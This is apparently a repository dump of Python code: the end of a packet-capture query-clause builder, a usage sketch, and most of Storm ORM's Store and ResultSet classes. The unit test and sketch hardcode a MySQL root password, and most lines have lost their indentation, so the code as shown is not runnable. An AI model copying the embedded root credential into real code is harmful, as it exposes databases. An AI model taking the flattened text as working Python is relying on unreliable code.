#log.info('query_clause.start_time: %s' % (query_clause.start_time))
# Contract the end time based on the interval end passed in
if clause.has_key("ENDTIME") and clause["ENDTIME"] != '0000-00-00 00:00:00' and clause["ENDTIME"] != '':
min_end = min(end_time, TimeUtils.time_str_to_seconds(clause["ENDTIME"]))
query_clause.end_time = TimeUtils.seconds_to_time_str(min_end)
else:
query_clause.end_time = TimeUtils.seconds_to_time_str(end_time)
if query_clause.end_time < query_clause.start_time:
log.error("Problem with time ranges! end time (%s) is less than start time (%s)"\
% (query_clause.end_time, query_clause.start_time))
#log.info('query_clause.end_time: %s' % (query_clause.end_time))
if clause.has_key("INTERFACE"):
query_clause.interfaces = clause["INTERFACE"].lower()
if clause.has_key("SRCIP"):
query_clause.src_ip = clause["SRCIP"]
if clause.has_key("DSTIP"):
query_clause.dst_ip = clause["DSTIP"]
if clause.has_key("SRCPORT"):
query_clause.src_port = clause["SRCPORT"]
if clause.has_key("DSTPORT"):
query_clause.dst_port = clause["DSTPORT"]
if clause.has_key("PORT"):
query_clause.any_port = clause["PORT"]
if clause.has_key("IPPROTOCOL"):
query_clause.protocol = clause["IPPROTOCOL"]
if clause.has_key("UEIP"):
query_clause.ueip = clause["UEIP"]
if clause.has_key("VLAN"):
query_clause.vlan = clause["VLAN"]
if clause.has_key("MPLS"):
query_clause.mpls = clause["MPLS"]
# To support SART legacy options, matchreversed and searchtunnel are folded into ipoptions.
if clause.has_key("MATCHREVERSED"):
if clause["MATCHREVERSED"].upper() == 'TRUE':
query_clause.ipoptions |= 0b1
elif clause["MATCHREVERSED"].upper() == 'FALSE':
query_clause.ipoptions &= 0b1110
elif int(clause["MATCHREVERSED"]) != 0:
query_clause.ipoptions |= 0b1
else:
query_clause.ipoptions &= 0b1110
if clause.has_key("SEARCHTUNNEL"):
if clause["SEARCHTUNNEL"].upper() == 'TRUE':
query_clause.ipoptions |= 0b110
elif clause["SEARCHTUNNEL"].upper() == 'FALSE':
query_clause.ipoptions &= 0b1001
elif int(clause["SEARCHTUNNEL"]) != 0:
query_clause.ipoptions |= 0b110
else:
query_clause.ipoptions &= 0b1001
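            # Note (added comment): judging from the masks above, bit 0 of ipoptions
            # appears to carry the MATCHREVERSED flag and bits 1-2 the SEARCHTUNNEL
            # flag; other bits (e.g. bit 3 in the default value of 9 set earlier)
            # are left untouched by these two options.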
# However, PI will only pass down IPOPTIONS (not matchreversed or searchtunnel)
if clause.has_key("IPOPTIONS"):
                log.info("Found ip options = %s" % (clause["IPOPTIONS"],))
query_clause.ipoptions = int(clause["IPOPTIONS"])
# Move the next pointer
query_clause.next = head
            # If there are no tunnels with the call, then TEID == 0, but CALLID != 0
            # In that case we do not want to really do an open ended ip search, which is what TEID == 0 would normally mean.
            # Therefore in that case we want to set end_time = start_time to nerf the open ended IP search
if query_clause.call_id > 0 and query_clause.teid == 0:
# Skipping user plane
pass
else:
head = ctypes.pointer(query_clause)
count += 1
cp_query = CALL_AGGREGATE_REQUEST()
recdopt_context.set_context_string(cp_query, 'start_time', TimeUtils.seconds_to_time_str(start_time))
recdopt_context.set_context_string(cp_query, 'end_time', TimeUtils.seconds_to_time_str(end_time))
if clause.has_key("INTERFACE"):
recdopt_context.set_context_string(cp_query, 'interfaces', clause["INTERFACE"].lower())
else:
recdopt_context.set_context_string(cp_query, 'interfaces', 'S1,S11,S5,GX,GN'.lower())
cp_query.call_serial_number = 0
cp_query.next = None
            # See if we have a call id/serial number that was passed in. If so, create a cp_query
            # entry to search for the control plane for that call.
            csn = query_clause.call_id
if csn != 0:
iface = cp_query.interfaces
                if cp_call_serial_dict.has_key((csn, iface)):
log.info(""" Duplicate Call Serial Number %s with interface = %s ignored""" % (csn,iface))
else:
#log.info(""" Adding CP for Call Serial Number %s with interface %s""" % (csn,iface))
cp_query.call_serial_number = csn
cp_query.next = cp_head
cp_head = ctypes.pointer(cp_query)
cp_count += 1
cp_call_serial_dict[(csn,iface)]=cp_query
# Set instance variables
self.up_query_clause = head
self.cp_query_clause = cp_head
self.up_count = count
self.cp_count = cp_count
if __name__ == "__main__":
# print to stdout
log.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(funcName)s::%(filename)s:%(lineno)s %(message)s")
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
log.addHandler(streamHandler)
log.info("download_clause Unit Test")
# Database objects are thread safe
database = create_database("mysql://root:gizzy@localhost:3306/recd")
class Options(object):
pass
options = Options()
options.acq_type = 'hw'
clause_list = DownloadClauseList(options,database,60)
print clause_list.error
print clause_list.valid
```
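A minimal usage sketch of the two classes above (this block is not part of the original module): it mirrors the unit test at the bottom of `download_clause.py`, reusing the same MySQL DSN and `Options` shape, then feeds the resolved time window into `OpenQueryClause`. The import path and the download id of 60 are illustrative assumptions, and the recdopt context (data store times, ctypes structures) is assumed to be initialised.
```python
# Hedged sketch: assumes download_clause.py is importable as shown and that the
# recdopt context provides the data store begin/end times and ctypes structs.
import logging
from storm.locals import create_database
from db.download_clause import DownloadClauseList, OpenQueryClause  # assumed path

logging.basicConfig(level=logging.INFO)

class Options(object):
    pass

options = Options()
options.acq_type = 'hw'  # anything other than 'sw' clamps times to the data store range

database = create_database("mysql://root:gizzy@localhost:3306/recd")
clause_list = DownloadClauseList(options, database, 60)  # 60 is an illustrative download id

if clause_list.valid:
    # Build the ctypes user-plane / control-plane query chains for the resolved window.
    query = OpenQueryClause(clause_list, clause_list.min_time, clause_list.max_time)
    print "user-plane clauses: %d, control-plane clauses: %d" % (query.up_count, query.cp_count)
else:
    print clause_list.error
```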
#### File: db/storm/store.py
```python
from copy import copy
from weakref import WeakValueDictionary
from operator import itemgetter
from storm.info import get_cls_info, get_obj_info, set_obj_info
from storm.variables import Variable, LazyValue
from storm.expr import (
Expr, Select, Insert, Update, Delete, Column, Count, Max, Min,
Avg, Sum, Eq, And, Asc, Desc, compile_python, compare_columns, SQLRaw,
Union, Except, Intersect, Alias, SetExpr)
from storm.exceptions import (
WrongStoreError, NotFlushedError, OrderLoopError, UnorderedError,
NotOneError, FeatureError, CompileError, LostObjectError, ClassInfoError)
from storm import Undef
from storm.cache import Cache
from storm.event import EventSystem
__all__ = ["Store", "AutoReload", "EmptyResultSet"]
PENDING_ADD = 1
PENDING_REMOVE = 2
class Store(object):
"""The Storm Store.
This is the highest-level interface to a database. It manages
transactions with L{commit} and L{rollback}, caching, high-level
querying with L{find}, and more.
Note that Store objects are not threadsafe. You should create one
Store per thread in your application, passing them the same
backend L{Database<storm.store.Database>} object.
"""
_result_set_factory = None
def __init__(self, database, cache=None):
"""
@param database: The L{storm.database.Database} instance to use.
@param cache: The cache to use. Defaults to a L{Cache} instance.
"""
self._database = database
self._event = EventSystem(self)
self._connection = database.connect(self._event)
self._alive = WeakValueDictionary()
self._dirty = {}
self._order = {} # (info, info) = count
if cache is None:
self._cache = Cache()
else:
self._cache = cache
self._implicit_flush_block_count = 0
self._sequence = 0 # Advisory ordering.
def get_database(self):
"""Return this Store's Database object."""
return self._database
@staticmethod
def of(obj):
"""Get the Store that the object is associated with.
If the given object has not yet been associated with a store,
return None.
"""
try:
return get_obj_info(obj).get("store")
except (AttributeError, ClassInfoError):
return None
def execute(self, statement, params=None, noresult=False):
"""Execute a basic query.
This is just like L{storm.database.Database.execute}, except
that a flush is performed first.
"""
if self._implicit_flush_block_count == 0:
self.flush()
return self._connection.execute(statement, params, noresult)
def close(self):
"""Close the connection."""
self._connection.close()
def commit(self):
"""Commit all changes to the database.
This invalidates the cache, so all live objects will have data
reloaded next time they are touched.
"""
self.flush()
self.invalidate()
self._connection.commit()
def rollback(self):
"""Roll back all outstanding changes, reverting to database state."""
for obj_info in self._dirty:
pending = obj_info.pop("pending", None)
if pending is PENDING_ADD:
# Object never got in the cache, so being "in the store"
# has no actual meaning for it.
del obj_info["store"]
elif pending is PENDING_REMOVE:
# Object never got removed, so it's still in the cache,
# and thus should continue to resolve from now on.
self._enable_lazy_resolving(obj_info)
self._dirty.clear()
self.invalidate()
self._connection.rollback()
def get(self, cls, key):
"""Get object of type cls with the given primary key from the database.
If the object is alive the database won't be touched.
@param cls: Class of the object to be retrieved.
@param key: Primary key of object. May be a tuple for composed keys.
@return: The object found with the given primary key, or None
if no object is found.
"""
if self._implicit_flush_block_count == 0:
self.flush()
if type(key) != tuple:
key = (key,)
cls_info = get_cls_info(cls)
assert len(key) == len(cls_info.primary_key)
primary_vars = []
for column, variable in zip(cls_info.primary_key, key):
if not isinstance(variable, Variable):
variable = column.variable_factory(value=variable)
primary_vars.append(variable)
primary_values = tuple(var.get(to_db=True) for var in primary_vars)
obj_info = self._alive.get((cls_info.cls, primary_values))
if obj_info is not None and not obj_info.get("invalidated"):
return self._get_object(obj_info)
where = compare_columns(cls_info.primary_key, primary_vars)
select = Select(cls_info.columns, where,
default_tables=cls_info.table, limit=1)
result = self._connection.execute(select)
values = result.get_one()
if values is None:
return None
return self._load_object(cls_info, result, values)
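    # Illustrative usage sketch (not part of the original Storm source), assuming
    # a hypothetical Person class with an integer primary key and a Pair class
    # with a composed key:
    #
    #   person = store.get(Person, 1)      # served from the cache if still alive
    #   pair = store.get(Pair, (1, 2))     # composed primary key passed as a tuple
    #
    # get() returns None instead of raising when no matching row exists.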
def find(self, cls_spec, *args, **kwargs):
"""Perform a query.
Some examples::
store.find(Person, Person.name == u"Joe") --> all Persons named Joe
store.find(Person, name=u"Joe") --> same
store.find((Company, Person), Person.company_id == Company.id) -->
iterator of tuples of Company and Person instances which are
associated via the company_id -> Company relation.
@param cls_spec: The class or tuple of classes whose
associated tables will be queried.
@param args: Instances of L{Expr}.
@param kwargs: Mapping of simple column names to values or
expressions to query for.
@return: A L{ResultSet} of instances C{cls_spec}. If C{cls_spec}
was a tuple, then an iterator of tuples of such instances.
"""
if self._implicit_flush_block_count == 0:
self.flush()
find_spec = FindSpec(cls_spec)
where = get_where_for_args(args, kwargs, find_spec.default_cls)
return self._result_set_factory(self, find_spec, where)
def using(self, *tables):
"""Specify tables to use explicitly.
The L{find} method generally does a good job at figuring out
the tables to query by itself, but in some cases it's useful
to specify them explicitly.
This is most often necessary when an explicit SQL join is
required. An example follows::
join = LeftJoin(Person, Person.id == Company.person_id)
print list(store.using(Company, join).find((Company, Person)))
The previous code snippet will produce an SQL statement
somewhat similar to this, depending on your backend::
SELECT company.id, employee.company_id, employee.id
FROM company
LEFT JOIN employee ON employee.company_id = company.id;
@return: A L{TableSet}, which has a C{find} method similar to
L{Store.find}.
"""
return self._table_set(self, tables)
def add(self, obj):
"""Add the given object to the store.
The object will be inserted into the database if it has not
yet been added.
The C{added} event will be fired on the object info's event system.
"""
self._event.emit("register-transaction")
obj_info = get_obj_info(obj)
store = obj_info.get("store")
if store is not None and store is not self:
raise WrongStoreError("%s is part of another store" % repr(obj))
pending = obj_info.get("pending")
if pending is PENDING_ADD:
pass
elif pending is PENDING_REMOVE:
del obj_info["pending"]
self._enable_lazy_resolving(obj_info)
# obj_info.event.emit("added")
elif store is None:
obj_info["store"] = self
obj_info["pending"] = PENDING_ADD
self._set_dirty(obj_info)
self._enable_lazy_resolving(obj_info)
obj_info.event.emit("added")
return obj
def remove(self, obj):
"""Remove the given object from the store.
The associated row will be deleted from the database.
"""
self._event.emit("register-transaction")
obj_info = get_obj_info(obj)
if obj_info.get("store") is not self:
raise WrongStoreError("%s is not in this store" % repr(obj))
pending = obj_info.get("pending")
if pending is PENDING_REMOVE:
pass
elif pending is PENDING_ADD:
del obj_info["store"]
del obj_info["pending"]
self._set_clean(obj_info)
self._disable_lazy_resolving(obj_info)
obj_info.event.emit("removed")
else:
obj_info["pending"] = PENDING_REMOVE
self._set_dirty(obj_info)
self._disable_lazy_resolving(obj_info)
obj_info.event.emit("removed")
def reload(self, obj):
"""Reload the given object.
The object will immediately have all of its data reset from
the database. Any pending changes will be thrown away.
"""
obj_info = get_obj_info(obj)
cls_info = obj_info.cls_info
if obj_info.get("store") is not self:
raise WrongStoreError("%s is not in this store" % repr(obj))
if "primary_vars" not in obj_info:
raise NotFlushedError("Can't reload an object if it was "
"never flushed")
where = compare_columns(cls_info.primary_key, obj_info["primary_vars"])
select = Select(cls_info.columns, where,
default_tables=cls_info.table, limit=1)
result = self._connection.execute(select)
values = result.get_one()
self._set_values(obj_info, cls_info.columns, result, values,
replace_unknown_lazy=True)
self._set_clean(obj_info)
def autoreload(self, obj=None):
"""Set an object or all objects to be reloaded automatically on access.
When a database-backed attribute of one of the objects is
accessed, the object will be reloaded entirely from the database.
@param obj: If passed, only mark the given object for
autoreload. Otherwise, all cached objects will be marked for
autoreload.
"""
self._mark_autoreload(obj, False)
def invalidate(self, obj=None):
"""Set an object or all objects to be invalidated.
This prevents Storm from returning the cached object without
first verifying that the object is still available in the
database.
This should almost never be called by application code; it is
only necessary if it is possible that an object has
disappeared through some mechanism that Storm was unable to
detect, like direct SQL statements within the current
transaction that bypassed the ORM layer. The Store
automatically invalidates all cached objects on transaction
boundaries.
"""
if obj is None:
self._cache.clear()
else:
self._cache.remove(get_obj_info(obj))
self._mark_autoreload(obj, True)
def reset(self):
"""Reset this store, causing all future queries to return new objects.
Beware this method: it breaks the assumption that there will never be
two objects in memory which represent the same database object.
This is useful if you've got in-memory changes to an object that you
want to "throw out"; next time they're fetched the objects will be
recreated, so in-memory modifications will not be in effect for future
queries.
"""
for obj_info in self._iter_alive():
if "store" in obj_info:
del obj_info["store"]
self._alive.clear()
self._dirty.clear()
self._cache.clear()
# The following line is untested, but then, I can't really find a way
# to test it without whitebox.
self._order.clear()
def _mark_autoreload(self, obj=None, invalidate=False):
if obj is None:
obj_infos = self._iter_alive()
else:
obj_infos = (get_obj_info(obj),)
for obj_info in obj_infos:
cls_info = obj_info.cls_info
for column in cls_info.columns:
if id(column) not in cls_info.primary_key_idx:
obj_info.variables[column].set(AutoReload)
if invalidate:
# Marking an object with 'invalidated' means that we're
# not sure if the object is actually in the database
# anymore, so before the object is returned from the cache
# (e.g. by a get()), the database should be queried to see
# if the object's still there.
obj_info["invalidated"] = True
# We want to make sure we've marked all objects as invalidated and set
# up their autoreloads before calling the invalidated hook on *any* of
# them, because an invalidated hook might use other objects and we want
# to prevent invalidation ordering issues.
if invalidate:
for obj_info in obj_infos:
self._run_hook(obj_info, "__storm_invalidated__")
def add_flush_order(self, before, after):
"""Explicitly specify the order of flushing two objects.
When the next database flush occurs, the order of data
modification statements will be ensured.
@param before: The object to flush first.
@param after: The object to flush after C{before}.
"""
pair = (get_obj_info(before), get_obj_info(after))
try:
self._order[pair] += 1
except KeyError:
self._order[pair] = 1
def remove_flush_order(self, before, after):
"""Cancel an explicit flush order specified with L{add_flush_order}.
@param before: The C{before} object previously specified in a
call to L{add_flush_order}.
@param after: The C{after} object previously specified in a
call to L{add_flush_order}.
"""
pair = (get_obj_info(before), get_obj_info(after))
self._order[pair] -= 1
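    # Illustrative usage sketch (not part of the original Storm source): if a
    # hypothetical `invoice` object must be written before `payment` on the next
    # flush, the ordering can be registered and later cancelled:
    #
    #   store.add_flush_order(invoice, payment)
    #   ...
    #   store.remove_flush_order(invoice, payment)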
def flush(self):
"""Flush all dirty objects in cache to database.
This method will first call the __storm_pre_flush__ hook of all dirty
objects. If more objects become dirty as a result of executing code
in the hooks, the hook is also called on them. The hook is only
called once for each object.
It will then flush each dirty object to the database, that is,
execute the SQL code to insert/delete/update them. After each
object is flushed, the hook __storm_flushed__ is called on it,
and if changes are made to the object it will get back to the
dirty list, and be flushed again.
Note that Storm will flush objects for you automatically, so you'll
only need to call this method explicitly in very rare cases where
normal flushing times are insufficient, such as when you want to
make sure a database trigger gets run at a particular time.
"""
self._event.emit("flush")
# The _dirty list may change under us while we're running
# the flush hooks, so we cannot just simply loop over it
# once. To prevent infinite looping we keep track of which
# objects we've called the hook for using a `flushing` dict.
flushing = {}
while self._dirty:
(obj_info, obj) = self._dirty.popitem()
if obj_info not in flushing:
flushing[obj_info] = obj
self._run_hook(obj_info, "__storm_pre_flush__")
self._dirty = flushing
predecessors = {}
for (before_info, after_info), n in self._order.iteritems():
if n > 0:
before_set = predecessors.get(after_info)
if before_set is None:
predecessors[after_info] = set((before_info,))
else:
before_set.add(before_info)
key_func = itemgetter("sequence")
# The external loop is important because items can get into the dirty
# state while we're flushing objects, ...
while self._dirty:
            # ... but we don't have to re-sort every time an object is flushed,
# so we have an internal loop too. If no objects become dirty
# during flush, this will clean self._dirty and the external loop
# will exit too.
sorted_dirty = sorted(self._dirty, key=key_func)
while sorted_dirty:
for i, obj_info in enumerate(sorted_dirty):
for before_info in predecessors.get(obj_info, ()):
if before_info in self._dirty:
break # A predecessor is still dirty.
else:
break # Found an item without dirty predecessors.
else:
raise OrderLoopError("Can't flush due to ordering loop")
del sorted_dirty[i]
self._dirty.pop(obj_info, None)
self._flush_one(obj_info)
self._order.clear()
        # That's not strictly necessary, but prevents getting into bigints.
self._sequence = 0
def _flush_one(self, obj_info):
cls_info = obj_info.cls_info
pending = obj_info.pop("pending", None)
if pending is PENDING_REMOVE:
expr = Delete(compare_columns(cls_info.primary_key,
obj_info["primary_vars"]),
cls_info.table)
self._connection.execute(expr, noresult=True)
# We're sure the cache is valid at this point.
obj_info.pop("invalidated", None)
self._disable_change_notification(obj_info)
self._remove_from_alive(obj_info)
del obj_info["store"]
elif pending is PENDING_ADD:
# Give a chance to the backend to process primary variables.
self._connection.preset_primary_key(cls_info.primary_key,
obj_info.primary_vars)
changes = self._get_changes_map(obj_info, True)
expr = Insert(changes, cls_info.table,
primary_columns=cls_info.primary_key,
primary_variables=obj_info.primary_vars)
result = self._connection.execute(expr)
# We're sure the cache is valid at this point. We just added
# the object.
obj_info.pop("invalidated", None)
self._fill_missing_values(obj_info, obj_info.primary_vars, result)
self._enable_change_notification(obj_info)
self._add_to_alive(obj_info)
else:
cached_primary_vars = obj_info["primary_vars"]
changes = self._get_changes_map(obj_info)
if changes:
expr = Update(changes,
compare_columns(cls_info.primary_key,
cached_primary_vars),
cls_info.table)
self._connection.execute(expr, noresult=True)
self._fill_missing_values(obj_info, obj_info.primary_vars)
self._add_to_alive(obj_info)
self._run_hook(obj_info, "__storm_flushed__")
obj_info.event.emit("flushed")
def block_implicit_flushes(self):
"""Block implicit flushes from operations like execute()."""
self._implicit_flush_block_count += 1
def unblock_implicit_flushes(self):
"""Unblock implicit flushes from operations like execute()."""
assert self._implicit_flush_block_count > 0
self._implicit_flush_block_count -= 1
def block_access(self):
"""Block access to the underlying database connection."""
self._connection.block_access()
def unblock_access(self):
"""Unblock access to the underlying database connection."""
self._connection.unblock_access()
def _get_changes_map(self, obj_info, adding=False):
"""Return a {column: variable} dictionary suitable for inserts/updates.
@param obj_info: ObjectInfo to inspect for changes.
@param adding: If true, any defined variables will be considered
a change and included in the returned map.
"""
cls_info = obj_info.cls_info
changes = {}
select_variables = []
for column in cls_info.columns:
variable = obj_info.variables[column]
if adding or variable.has_changed():
if variable.is_defined():
changes[column] = variable
else:
lazy_value = variable.get_lazy()
if isinstance(lazy_value, Expr):
if id(column) in cls_info.primary_key_idx:
select_variables.append(variable) # See below.
changes[column] = variable
else:
changes[column] = lazy_value
# If we have any expressions in the primary variables, we
# have to resolve them now so that we have the identity of
# the inserted object available later.
if select_variables:
resolve_expr = Select([variable.get_lazy()
for variable in select_variables])
result = self._connection.execute(resolve_expr)
for variable, value in zip(select_variables, result.get_one()):
result.set_variable(variable, value)
return changes
def _fill_missing_values(self, obj_info, primary_vars, result=None):
"""Fill missing values in variables of the given obj_info.
This method will verify which values are unset in obj_info,
and set them to AutoReload, or if it's part of the primary
key, query the database for the actual values.
@param obj_info: ObjectInfo to have its values filled.
@param primary_vars: Variables composing the primary key with
up-to-date values (cached variables may be out-of-date when
this method is called).
@param result: If some value in the set of primary variables
isn't defined, it must be retrieved from the database
using database-dependent logic, which is provided by the
backend in the result of the query which inserted the object.
"""
cls_info = obj_info.cls_info
cached_primary_vars = obj_info.get("primary_vars")
primary_key_idx = cls_info.primary_key_idx
missing_columns = []
for column in cls_info.columns:
variable = obj_info.variables[column]
if not variable.is_defined():
idx = primary_key_idx.get(id(column))
if idx is not None:
if (cached_primary_vars is not None
and variable.get_lazy() is AutoReload):
# For auto-reloading a primary key, just
# get the value out of the cache.
variable.set(cached_primary_vars[idx].get())
else:
missing_columns.append(column)
else:
# Any lazy values are overwritten here. This value
# must have just been sent to the database, so this
# was already set there.
variable.set(AutoReload)
else:
variable.checkpoint()
if missing_columns:
where = result.get_insert_identity(cls_info.primary_key,
primary_vars)
result = self._connection.execute(Select(missing_columns, where))
self._set_values(obj_info, missing_columns,
result, result.get_one())
def _validate_alive(self, obj_info):
"""Perform cache validation for the given obj_info."""
where = compare_columns(obj_info.cls_info.primary_key,
obj_info["primary_vars"])
result = self._connection.execute(Select(SQLRaw("1"), where))
if not result.get_one():
raise LostObjectError("Object is not in the database anymore")
obj_info.pop("invalidated", None)
def _load_object(self, cls_info, result, values):
# _set_values() need the cls_info columns for the class of the
# actual object, not from a possible wrapper (e.g. an alias).
cls = cls_info.cls
cls_info = get_cls_info(cls)
# Prepare cache key.
primary_vars = []
columns = cls_info.columns
for value in values:
if value is not None:
break
else:
# We've got a row full of NULLs, so consider that the object
# wasn't found. This is useful for joins, where non-existent
# rows are represented like that.
return None
for i in cls_info.primary_key_pos:
value = values[i]
variable = columns[i].variable_factory(value=value, from_db=True)
primary_vars.append(variable)
# Lookup cache.
primary_values = tuple(var.get(to_db=True) for var in primary_vars)
obj_info = self._alive.get((cls, primary_values))
if obj_info is not None:
# Found object in cache, and it must be valid since the
# primary key was extracted from result values.
obj_info.pop("invalidated", None)
# Take that chance and fill up any undefined variables
# with fresh data, since we got it anyway.
self._set_values(obj_info, cls_info.columns, result,
values, keep_defined=True)
# We're not sure if the obj is still in memory at this
# point. This will rebuild it if needed.
obj = self._get_object(obj_info)
else:
# Nothing found in the cache. Build everything from the ground.
obj = cls.__new__(cls)
obj_info = get_obj_info(obj)
obj_info["store"] = self
self._set_values(obj_info, cls_info.columns, result, values,
replace_unknown_lazy=True)
self._add_to_alive(obj_info)
self._enable_change_notification(obj_info)
self._enable_lazy_resolving(obj_info)
self._run_hook(obj_info, "__storm_loaded__")
return obj
def _get_object(self, obj_info):
"""Return object for obj_info, rebuilding it if it's dead."""
obj = obj_info.get_obj()
if obj is None:
cls = obj_info.cls_info.cls
obj = cls.__new__(cls)
obj_info.set_obj(obj)
set_obj_info(obj, obj_info)
            # Re-enable change notification, as it may have been implicitly
# disabled when the previous object has been collected
self._enable_change_notification(obj_info)
self._run_hook(obj_info, "__storm_loaded__")
# Renew the cache.
self._cache.add(obj_info)
return obj
@staticmethod
def _run_hook(obj_info, hook_name):
func = getattr(obj_info.get_obj(), hook_name, None)
if func is not None:
func()
def _set_values(self, obj_info, columns, result, values,
keep_defined=False, replace_unknown_lazy=False):
if values is None:
raise LostObjectError("Can't obtain values from the database "
"(object got removed?)")
obj_info.pop("invalidated", None)
for column, value in zip(columns, values):
variable = obj_info.variables[column]
lazy_value = variable.get_lazy()
is_unknown_lazy = not (lazy_value is None or
lazy_value is AutoReload)
if keep_defined:
if variable.is_defined() or is_unknown_lazy:
continue
elif is_unknown_lazy and not replace_unknown_lazy:
# This should *never* happen, because whenever we get
# to this point it should be after a flush() which
# updated the database with lazy values and then replaced
# them by AutoReload. Letting this go through means
# we're blindly discarding an unknown lazy value and
# replacing it by the value from the database.
raise RuntimeError("Unexpected situation. "
"Please contact the developers.")
if value is None:
variable.set(value, from_db=True)
else:
result.set_variable(variable, value)
variable.checkpoint()
def _is_dirty(self, obj_info):
return obj_info in self._dirty
def _set_dirty(self, obj_info):
if obj_info not in self._dirty:
self._dirty[obj_info] = obj_info.get_obj()
obj_info["sequence"] = self._sequence = self._sequence + 1
def _set_clean(self, obj_info):
self._dirty.pop(obj_info, None)
def _iter_dirty(self):
return self._dirty
def _add_to_alive(self, obj_info):
"""Add an object to the set of known in-memory objects.
When an object is added to the set of known in-memory objects,
the key is built from a copy of the current variables that are
part of the primary key. This means that, when an object is
retrieved from the database, these values may be used to get
the cached object which is already in memory, even if it
requested the primary key value to be changed. For that reason,
when changes to the primary key are flushed, the alive object
key should also be updated to reflect these changes.
In addition to tracking objects alive in memory, we have a strong
reference cache which keeps a fixed number of last-used objects
in-memory, to prevent further database access for recently fetched
objects.
"""
cls_info = obj_info.cls_info
old_primary_vars = obj_info.get("primary_vars")
if old_primary_vars is not None:
old_primary_values = tuple(
var.get(to_db=True) for var in old_primary_vars)
self._alive.pop((cls_info.cls, old_primary_values), None)
new_primary_vars = tuple(variable.copy()
for variable in obj_info.primary_vars)
new_primary_values = tuple(
var.get(to_db=True) for var in new_primary_vars)
self._alive[cls_info.cls, new_primary_values] = obj_info
obj_info["primary_vars"] = new_primary_vars
self._cache.add(obj_info)
def _remove_from_alive(self, obj_info):
"""Remove an object from the cache.
This method is only called for objects that were explicitly
deleted and flushed. Objects that are unused will get removed
from the cache dictionary automatically by their weakref callbacks.
"""
primary_vars = obj_info.get("primary_vars")
if primary_vars is not None:
self._cache.remove(obj_info)
primary_values = tuple(var.get(to_db=True) for var in primary_vars)
del self._alive[obj_info.cls_info.cls, primary_values]
del obj_info["primary_vars"]
def _iter_alive(self):
return self._alive.values()
def _enable_change_notification(self, obj_info):
obj_info.event.emit("start-tracking-changes", self._event)
obj_info.event.hook("changed", self._variable_changed)
def _disable_change_notification(self, obj_info):
obj_info.event.unhook("changed", self._variable_changed)
obj_info.event.emit("stop-tracking-changes", self._event)
def _variable_changed(self, obj_info, variable,
old_value, new_value, fromdb):
# The fromdb check makes sure that values coming from the
# database don't mark the object as dirty again.
# XXX The fromdb check is untested. How to test it?
if not fromdb:
if new_value is not Undef and new_value is not AutoReload:
if obj_info.get("invalidated"):
# This might be a previously alive object being
# updated. Let's validate it now to improve debugging.
# This will raise LostObjectError if the object is gone.
self._validate_alive(obj_info)
self._set_dirty(obj_info)
def _enable_lazy_resolving(self, obj_info):
obj_info.event.hook("resolve-lazy-value", self._resolve_lazy_value)
def _disable_lazy_resolving(self, obj_info):
obj_info.event.unhook("resolve-lazy-value", self._resolve_lazy_value)
def _resolve_lazy_value(self, obj_info, variable, lazy_value):
"""Resolve a variable set to a lazy value when it's touched.
This method is hooked into the obj_info to resolve variables
set to lazy values when they're accessed. It will first flush
the store, and then set all variables set to AutoReload to
their database values.
"""
if lazy_value is not AutoReload and not isinstance(lazy_value, Expr):
# It's not something we handle.
return
# XXX This will do it for now, but it should really flush
# just this single object and ones that it depends on.
# _flush_one() doesn't consider dependencies, so it may
# not be used directly. Maybe allow flush(obj)?
if self._implicit_flush_block_count == 0:
self.flush()
autoreload_columns = []
for column in obj_info.cls_info.columns:
if obj_info.variables[column].get_lazy() is AutoReload:
autoreload_columns.append(column)
if autoreload_columns:
where = compare_columns(obj_info.cls_info.primary_key,
obj_info["primary_vars"])
result = self._connection.execute(
Select(autoreload_columns, where))
self._set_values(obj_info, autoreload_columns,
result, result.get_one())
class ResultSet(object):
"""The representation of the results of a query.
Note that having an instance of this class does not indicate that
a database query has necessarily been made. Database queries are
put off until absolutely necessary.
Generally these should not be constructed directly, but instead
retrieved from calls to L{Store.find}.
"""
def __init__(self, store, find_spec,
where=Undef, tables=Undef, select=Undef):
self._store = store
self._find_spec = find_spec
self._where = where
self._tables = tables
self._select = select
self._order_by = find_spec.default_order
self._offset = Undef
self._limit = Undef
self._distinct = False
self._group_by = Undef
self._having = Undef
def copy(self):
"""Return a copy of this ResultSet object, with the same configuration.
"""
result_set = object.__new__(self.__class__)
result_set.__dict__.update(self.__dict__)
if self._select is not Undef:
# This expression must be copied because we may have to change it
# in-place inside _get_select().
result_set._select = copy(self._select)
return result_set
def config(self, distinct=None, offset=None, limit=None):
"""Configure this result object in-place. All parameters are optional.
@param distinct: If True, enables usage of the DISTINCT keyword in
the query. If a tuple or list of columns, inserts a DISTINCT ON
(only supported by PostgreSQL).
@param offset: Offset where results will start to be retrieved
from the result set.
@param limit: Limit the number of objects retrieved from the
result set.
@return: self (not a copy).
"""
if distinct is not None:
self._distinct = distinct
if offset is not None:
self._offset = offset
if limit is not None:
self._limit = limit
return self
def _get_select(self):
if self._select is not Undef:
if self._order_by is not Undef:
self._select.order_by = self._order_by
if self._limit is not Undef: # XXX UNTESTED!
self._select.limit = self._limit
if self._offset is not Undef: # XXX UNTESTED!
self._select.offset = self._offset
return self._select
columns, default_tables = self._find_spec.get_columns_and_tables()
return Select(columns, self._where, self._tables, default_tables,
self._order_by, offset=self._offset, limit=self._limit,
distinct=self._distinct, group_by=self._group_by,
having=self._having)
def _load_objects(self, result, values):
return self._find_spec.load_objects(self._store, result, values)
def __iter__(self):
"""Iterate the results of the query.
"""
result = self._store._connection.execute(self._get_select())
for values in result:
yield self._load_objects(result, values)
def __getitem__(self, index):
"""Get an individual item by offset, or a range of items by slice.
@return: The matching object or, if a slice is used, a new
L{ResultSet} will be returned appropriately modified with
C{OFFSET} and C{LIMIT} clauses.
"""
if isinstance(index, (int, long)):
if index == 0:
result_set = self
else:
if self._offset is not Undef:
index += self._offset
result_set = self.copy()
result_set.config(offset=index, limit=1)
obj = result_set._any()
if obj is None:
raise IndexError("Index out of range")
return obj
if not isinstance(index, slice):
raise IndexError("Can't index ResultSets with %r" % (index,))
if index.step is not None:
raise IndexError("Stepped slices not yet supported: %r"
% (index.step,))
offset = self._offset
limit = self._limit
if index.start is not None:
if offset is Undef:
offset = index.start
else:
offset += index.start
if limit is not Undef:
limit = max(0, limit - index.start)
if index.stop is not None:
if index.start is None:
new_limit = index.stop
else:
new_limit = index.stop - index.start
if limit is Undef or limit > new_limit:
limit = new_limit
return self.copy().config(offset=offset, limit=limit)
